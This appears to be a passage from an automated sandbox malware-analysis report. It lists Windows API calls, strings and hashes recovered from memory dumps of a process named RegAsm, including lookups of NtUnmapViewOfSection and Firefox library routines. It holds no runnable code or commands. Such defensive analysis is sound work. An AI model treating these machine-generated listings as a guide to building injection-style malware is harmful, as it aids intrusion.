                                                                                    • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                    • API String ID: 3217676052-1401603581
                                                                                    • Opcode ID: 5732aacc14c51ebfd25fcc35d4a704cd0e2e80190042ab8bc60d20784d5fac73
                                                                                    • Instruction ID: bcaae2a58e4037b62c7f0040e3b9ac632e3111d96814dac22b187094dc224c5d
                                                                                    • Opcode Fuzzy Hash: 5732aacc14c51ebfd25fcc35d4a704cd0e2e80190042ab8bc60d20784d5fac73
                                                                                    • Instruction Fuzzy Hash: 0D210739702501AFCA148FEAC854E9A3375EB87728F1445A8E405A7F40FB31A8428B99
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040DECC
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                      • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040DEEE
                                                                                    • memcpy.MSVCRT ref: 0040DF2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 214693668-4289949731
                                                                                    • Opcode ID: 87030841b56bcc62358ccb61677a84b8acedd28d2148ee66ae04f16d96e4cb73
                                                                                    • Instruction ID: 3af340325ffd46d07c9016e9fd5090ae59368ed9ded2c1f09607058c21e43e9a
                                                                                    • Opcode Fuzzy Hash: 87030841b56bcc62358ccb61677a84b8acedd28d2148ee66ae04f16d96e4cb73
                                                                                    • Instruction Fuzzy Hash: E411DD317003059FCB24DE9CC981A6AB3E8EB45704B10497EF853EB2C2DB74E9488798
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF770,-00000001,?,6CCAE330,?,6CC5BDF7), ref: 6CC9A7AF
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6CC5BDF7), ref: 6CC9A7C2
                                                                                    • moz_xmalloc.MOZGLUE(00000018,?,6CC5BDF7), ref: 6CC9A7E4
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A80A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                    • String ID: accelerator.dll
                                                                                    • API String ID: 2442272132-2426294810
                                                                                    • Opcode ID: 278045426007937eac2b31c12e477f06b2d5e7015ad246891c16642f0c2d893b
                                                                                    • Instruction ID: 35150c22d8cf806bb711a509f456227c69f05d7e3148b6fe928cb720fcb5e5f9
                                                                                    • Opcode Fuzzy Hash: 278045426007937eac2b31c12e477f06b2d5e7015ad246891c16642f0c2d893b
                                                                                    • Instruction Fuzzy Hash: 7D01A2786003049FDB04CFDAD8C9D5577F8FF8931470480AAE8099B751EB70A800CBA0
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ole32,?,6CC3EE51,?), ref: 6CC3F0B2
                                                                                    • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6CC3F0C2
                                                                                    Strings
                                                                                    • ole32, xrefs: 6CC3F0AD
                                                                                    • Could not find CoTaskMemFree, xrefs: 6CC3F0E3
                                                                                    • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6CC3F0DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                    • API String ID: 2574300362-1578401391
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47235), ref: 6CC700D8
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6CC700F7
                                                                                    • FreeLibrary.KERNEL32(?,6CC47235), ref: 6CC7010E
                                                                                    Strings
                                                                                    • wintrust.dll, xrefs: 6CC700D3
                                                                                    • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6CC700F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                    • API String ID: 145871493-2559046807
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47204), ref: 6CC70088
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6CC700A7
                                                                                    • FreeLibrary.KERNEL32(?,6CC47204), ref: 6CC700BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                    • API String ID: 145871493-3385133079
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC9C0E9), ref: 6CC9C418
                                                                                    • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CC9C437
                                                                                    • FreeLibrary.KERNEL32(?,6CC9C0E9), ref: 6CC9C44C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                    • API String ID: 145871493-2623246514
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC9748B,?), ref: 6CC975B8
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CC975D7
                                                                                    • FreeLibrary.KERNEL32(?,6CC9748B,?), ref: 6CC975EC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                    • API String ID: 145871493-3641475894
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC97592), ref: 6CC97608
                                                                                    • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CC97627
                                                                                    • FreeLibrary.KERNEL32(?,6CC97592), ref: 6CC9763C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                    • API String ID: 145871493-1050664331
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,00000000,?,?,6CC9BE49), ref: 6CC9BEC4
                                                                                    • RtlCaptureStackBackTrace.NTDLL ref: 6CC9BEDE
                                                                                    • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CC9BE49), ref: 6CC9BF38
                                                                                    • RtlReAllocateHeap.NTDLL ref: 6CC9BF83
                                                                                    • RtlFreeHeap.NTDLL(6CC9BE49,00000000), ref: 6CC9BFA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                    • String ID:
                                                                                    • API String ID: 2764315370-0
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88E6E
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88EBF
                                                                                    • free.MOZGLUE(?,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F24
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88F46
                                                                                    • free.MOZGLUE(?,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F7A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F8F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC460F4
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC46180
                                                                                    • free.MOZGLUE(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC46211
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC46229
                                                                                    • free.MOZGLUE(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC4625E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC46271
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8284D
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8289A
                                                                                    • free.MOZGLUE(?,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC828F1
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC82910
                                                                                    • free.MOZGLUE(00000001,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8293C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8294E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: d51013bc4175baa451af49b4aa102f09a6bd09a68578f220f25933a2646bc7a9
                                                                                    • Instruction ID: 41aeed2eae40dc61875893e2712f1ec6518153438c2b34b42fc713fc613a7413
                                                                                    • Opcode Fuzzy Hash: d51013bc4175baa451af49b4aa102f09a6bd09a68578f220f25933a2646bc7a9
                                                                                    • Instruction Fuzzy Hash: A141AFB1A012068FEB14CF68D89876B7BF6EB45308F250939D956EB740F731E905CB61
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6CC3D06C
                                                                                    • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6CC3D139
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                    • String ID: MOZ_CRASH()
                                                                                    • API String ID: 1090480015-2608361144
                                                                                    • Opcode ID: 13b19b7ea74258da696513d70c52981f426b789ea78fd624b888345ac9e239f2
                                                                                    • Instruction ID: 1d1fe39b57e9816c8628aa655bad432dc5f080289bf79c42a6fb95dad84e9059
                                                                                    • Opcode Fuzzy Hash: 13b19b7ea74258da696513d70c52981f426b789ea78fd624b888345ac9e239f2
                                                                                    • Instruction Fuzzy Hash: 1941BE72B113264FDB048EBD9D943AA76B0EB49B14F24013DEA19F7784E7B59C018BC8
                                                                                    APIs
                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC34EE9
                                                                                    • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC34F02
                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CC34F1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                    • String ID:
                                                                                    • API String ID: 713647276-0
                                                                                    • Opcode ID: 211b947d8446e0edfccbaff786d33c418f2b2d5a631f6567252523424394b90c
                                                                                    • Instruction ID: e4f3eb7713e0872eb3c081d0f68176fdd85a4310c73e7e28641e02e56747ae65
                                                                                    • Opcode Fuzzy Hash: 211b947d8446e0edfccbaff786d33c418f2b2d5a631f6567252523424394b90c
                                                                                    • Instruction Fuzzy Hash: F941E071608B119FC701CF69D88095BFBE4BF89344F149A2DF46987781EB32E958CB91
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A858
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9A87B
                                                                                      • Part of subcall function 6CC9A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6CC9A88F,00000000), ref: 6CC9A9F1
                                                                                    • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6CC9A8FF
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9A90C
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A97E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1355178011-0
                                                                                    • Opcode ID: ace17e2cdaa41b462901068939d8770369d452a6eb4e6e9fd69b426e84319e8a
                                                                                    • Instruction ID: 19675898b83399db239e5b88cd89347c485339591f4c317e569bb437d40a62ba
                                                                                    • Opcode Fuzzy Hash: ace17e2cdaa41b462901068939d8770369d452a6eb4e6e9fd69b426e84319e8a
                                                                                    • Instruction Fuzzy Hash: D041A1B5E002089FDB00DFE8D885BDEB771FF44324F148629E826AB791E731A945CB91
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(-00000002,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC4159C
                                                                                    • memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC415BC
                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC415E7
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC41606
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC41637
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                    • String ID:
                                                                                    • API String ID: 733145618-0
                                                                                    • Opcode ID: eb4634277809461e843276b5e188d1b364c5ce903a71c98c27deeefc60d37ec4
                                                                                    • Instruction ID: f9d7c31c209c4dde9b9054c7e0e45ccc133a1c05bdd6d021715f603d13809219
                                                                                    • Opcode Fuzzy Hash: eb4634277809461e843276b5e188d1b364c5ce903a71c98c27deeefc60d37ec4
                                                                                    • Instruction Fuzzy Hash: 4F31C472A005148BCB188E6CD8504AE77A9FB81374724CB2DE863DBBD4FB30D9258791
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AD9D
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9ADAC
                                                                                    • free.MOZGLUE(?,?,?,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE01
                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE1D
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
